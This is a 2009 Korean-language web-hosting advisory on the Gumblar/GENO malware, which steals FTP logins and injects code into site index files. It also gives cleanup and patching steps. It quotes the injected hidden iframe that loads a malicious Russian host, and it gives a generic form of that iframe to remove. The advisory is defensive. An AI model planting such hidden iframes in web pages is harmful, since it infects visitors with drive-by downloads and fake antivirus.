내가찾은 신대륙 넥스트라인

제목

GENO 악성코드 ftp계정도용통한 index, main 변조

작성일

2009-08-28 14:28:00

제목 : GENO 악성코드 ftp계정도용통한 index, main 변조

내용 :
최근 검블러(Gumblar) 혹은 GENO 라고 불리는 악성코드가 급속히 전파되고 있습니다.
해당 악성코드는 어도비(Adobe)사의 아크로뱃이나 플래쉬의 보안 패치가 되지 않은 PC가 특정 웹 사이트를 열기만 해도 감염되는 '드라이브 바이 다운로드' 방식으로 전파되고 있어 감염속도가 매우 빠릅니다.
또한 감염된 PC 이용자가 웹사이트의 파일을 관리하는 FTP 프로그램을 가지고 있을 경우 ID와 비밀번호를 빼내 해당 웹사이트의 index , main 등의 이름을 가진 html, php 파일들을 변조해서악성코드를 다운받는 코드를 심어놓게 됩니다.

증상 :
본 현상은 사이트가 초기화면이 느려지거나, 화면이 틀어지거나, 관리자모드 접근시 에러메시지 출력 등 을 보실 수 있습니다.
실제 index.php파일의 주요 부분입니다.
<body><iframe src="http://3e0.ru:8080/index.php" width=129 height=172 style="visibility: hidden"></iframe>
<p> 페이지를 보려면, 프레임을 볼 수 있는 브라우저가 필요합니다. </p>
</bo
상위와 같이 index.php 내용이 변경됩니다. 맨 아래 </body>태그가 정상적으로 저장되지 않고, 3e0.ru 사이트로 접속시에는 activeX가 사용자가 모르게 설치되고 10초 뒤에 자동으로 리부팅을 시킵니다.
activex로 설치된 파일은 요즘 뜨고 있는 가짜 백신 Home Antivirus 2010 가 자동으로 설치되도록 하는 것입니다.

PC 사용자가 악성코드 파일을 삭제한 뒤에도 PC를 껐다가 켤 때 악성코드가 재설치를 시도하는 가짜백신 ‘Home Antivirus 2010은 마이크로스프트 운영체제(OS) 윈도의 정상 시스템 파일인 ntfs.sys 파일을 변조해 악성코드 재설치를 실행합니다.
가짜백신에 감염된 경우에는 PC 모니터의 오른쪽 아래 부분에 ‘당신의 컴퓨터가 악성코드에 감염됐다(Your Computer is infected!)’는 허위 경고창이 뜹니다.
하지만 이 경고창은 가짜입니다. 사용자의 PC 내에 쓰레기 파일들을 마구잡이로 생성시킨 후 그것들을 찾아 진단·치료하는 과정에서 대금결제를 요구하는 수법입니다. 경고창의 말만 믿고 치료를 위해 ‘Remove’를 클릭하거나 허위 경고 팝업창을 클릭하면 결제 페이지로 연결됩니다.

실질적으로 Your Computer is infected!가 무슨 프로세스인지 windows 작업관리자를 띄워도 이름이 나타나지 않도록 되어있어서 일반 유저들은 확인을 제대로 할 수 없게 됩니다.

해결 방법 :
1) 해당 pc 에서 악성코드를 제거해야 합니다. 제거가 어려울 경우 OS 를 재설치해야 합니다.
악성코드가 제거되지 않은 상태에서 단순히 비밀번호를 바꾼채 ftp 접속을 하게 되면 지속적으로 ID 와 비밀번호가 유출되어서 사이트 변조가 지속됩니다.
부득이 하게 악성코드 제거되기 전에 급하게 수정을 하실려고 한다면 비밀번호를 바꾸시고 ftp 사용을 막고, 대신 sftp 를 사용해야 합니다.
sftp 는 향후 동일 문제 예방을 위해서라도 ftp 대신 계속 사용을 하실것을 권장해드립니다.

2) Microsoft에서 제공하는 최신 보안 패치를 적용하여 인터넷 익스플로러에 존재하는 취약점 제거를 합니다.

3) 어도비 최신 버전 업데이트 : 어도비 리더 실행 후 상단 메뉴에서 [도움말] – [업데이트 확인]을 통해 최신 버전인지 확인 후 필요 시 업데이트 합니다.
어도비 업데이트 사이트 : http://www.adobe.com/kr/downloads/updates/

4) 어도비 플래쉬 플레이어(Adobe Flash Player)를 최신 버전으로 업데이트 : 윈도우 시스템 (보통 C:\Windows\System32) Macromed 의 Flash 폴더로 이동하여FlashUtil9?.exe (e,f 등 알파벳) 실행합니다.

5) 백신 사용 및 최신 엔진 업데이트 (실시간 감시 기능 사용) : V3(V3 IS, V3 365, V3 Lite 및 V3 Net for Server 제품군)에서는 2009.05.21.00 엔진에서부터 진단 및 치료 가능합니다.

6) 사이트가드(SiteGuard) 설치 및 적용 : 위험 웹사이트 사전 차단 프로그램인 사이트가드 설치로 악의적인 웹 사이트에 대한 검사 및 차단합니다.

7) 서버내 변조된 html, php 파일에서 다음과 같은 형태의 코드를 제거하시기 바랍니다.
< iframe src = " http://xxxxxxxxxxx.cn:8080/index.php" width=198 height=141 >


	MS IIS FTP 서비스의 원격코드실행 취약점 주의


	[윈도우즈 보안] 2009년 8월 Microsoft 보안 업데이트